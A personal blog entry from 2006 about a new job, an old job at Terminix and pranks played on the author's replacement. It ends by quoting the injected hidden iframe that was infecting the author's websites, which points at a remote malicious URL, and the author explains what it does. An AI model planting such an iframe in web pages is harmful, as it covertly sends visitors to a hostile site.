Friday = Beer Day!

June 9th 2006

So I guess I overreacted about the javascript issue at work, since they haven’t asked me about it. Instead I had one boss say that I was doing a great job, and the other said that all of my code was very clean.

Have I mentioned that Friday’s are beer days at work? And they provide lots of candy?

I’ve been given a -lot- of different projects, which makes me feel good because it means they trust me to do the work. I’ve also been bought lunch almost every other day (they tend to do this a lot), and I’ve been asked to sit in on a conference call on Monday.

I stopped by Terminix after work today to pick up my last paycheck. Was nice to see some people again, I actually miss my technicians. They apparently aren’t adjusting to the new girl that replaced me. So much that they’ve put staples in her chair, taped up her keyboard, unplugged everything from her computer, hidden her pictures, turned her bulletins upside down, changed the dates on her calendar, etc.

I boggle at myself when I think that there are some things I miss about the job. And then I think about how wonderful my new job is, and I’m very grateful to have both opportunities.

    So the worm that has been infecting the Grove’s website and my gaming website (but has yet to hit my journal thankfully) is this:
    iframe width=1 height=1 src=http://step57.info/traff/index2.php
    style=border: 0
    Essentially what this worm/virus/whatever does is imbeds an iframe into your site which forces people to go to the link above, and make your anti-virus go haywire. […]
